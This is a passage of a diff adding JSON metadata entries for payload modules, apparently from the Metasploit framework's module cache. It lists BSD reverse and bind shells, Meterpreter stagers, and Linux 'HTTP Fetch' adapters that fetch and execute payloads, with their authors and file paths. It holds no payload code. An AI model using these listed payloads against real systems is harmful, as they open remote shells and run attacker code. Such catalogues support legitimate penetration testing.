+ "payload_bsd/x64/exec": { + "name": "BSD x64 Execute Command", + "fullname": "payload/bsd/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/exec.rb", + "is_install_path": true, + "ref_name": "bsd/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_ipv6_tcp": { + "name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/bsd/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell over IPv6", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_tcp": { + "name": "BSD x64 Shell Bind TCP", + "fullname": "payload/bsd/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "joev " + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_bind_tcp_small": { + "name": "BSD x64 Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/x64/shell_bind_tcp_small", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_bind_tcp_small", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_ipv6_tcp": { + "name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/bsd/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_tcp": { + "name": "BSD x64 Shell Reverse TCP", + "fullname": "payload/bsd/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "joev " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x64/shell_reverse_tcp_small": { + "name": "BSD x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/x64/shell_reverse_tcp_small", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c" + ], + "platform": "BSD", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", + "is_install_path": true, + "ref_name": "bsd/x64/shell_reverse_tcp_small", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/exec": { + "name": "BSD Execute Command", + "fullname": "payload/bsd/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "snagg ", + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/exec.rb", + "is_install_path": true, + "ref_name": "bsd/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/metsvc_bind_tcp": { + "name": "FreeBSD Meterpreter Service, Bind TCP", + "fullname": "payload/bsd/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/metsvc_reverse_tcp": { + "name": "FreeBSD Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/bsd/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell/bind_ipv6_tcp": { + "name": "BSD Command Shell, Bind TCP Stager (IPv6)", + "fullname": "payload/bsd/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/bind_ipv6_tcp" + }, + "payload_bsd/x86/shell/bind_tcp": { + "name": "BSD Command Shell, Bind TCP Stager", + "fullname": "payload/bsd/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/bind_tcp" + }, + "payload_bsd/x86/shell/find_tag": { + "name": "BSD Command Shell, Find Tag Stager", + "fullname": "payload/bsd/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/find_tag" + }, + "payload_bsd/x86/shell/reverse_ipv6_tcp": { + "name": "BSD Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/bsd/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/reverse_ipv6_tcp" + }, + "payload_bsd/x86/shell/reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Stager", + "fullname": "payload/bsd/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsd/x86/shell", + "stager_refname": "bsd/x86/reverse_tcp" + }, + "payload_bsd/x86/shell_bind_tcp": { + "name": "BSD Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_bind_tcp_ipv6": { + "name": "BSD Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/bsd/x86/shell_bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Listen for a connection and spawn a command shell over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_find_port": { + "name": "BSD Command Shell, Find Port Inline", + "fullname": "payload/bsd/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_find_tag": { + "name": "BSD Command Shell, Find Tag Inline", + "fullname": "payload/bsd/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_reverse_tcp_ipv6": { + "name": "BSD Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/bsd/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell/bind_tcp": { + "name": "BSDi Command Shell, Bind TCP Stager", + "fullname": "payload/bsdi/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsdi/x86/shell", + "stager_refname": "bsdi/x86/bind_tcp" + }, + "payload_bsdi/x86/shell/reverse_tcp": { + "name": "BSDi Command Shell, Reverse TCP Stager", + "fullname": "payload/bsdi/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsdi/x86/shell", + "stager_refname": "bsdi/x86/reverse_tcp" + }, + "payload_bsdi/x86/shell_bind_tcp": { + "name": "BSDi Command Shell, Bind TCP Inline", + "fullname": "payload/bsdi/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell_find_port": { + "name": "BSDi Command Shell, Find Port Inline", + "fullname": "payload/bsdi/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell_reverse_tcp": { + "name": "BSDi Command Shell, Reverse TCP Inline", + "fullname": "payload/bsdi/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/aarch64/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/http/aarch64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.", + "references": 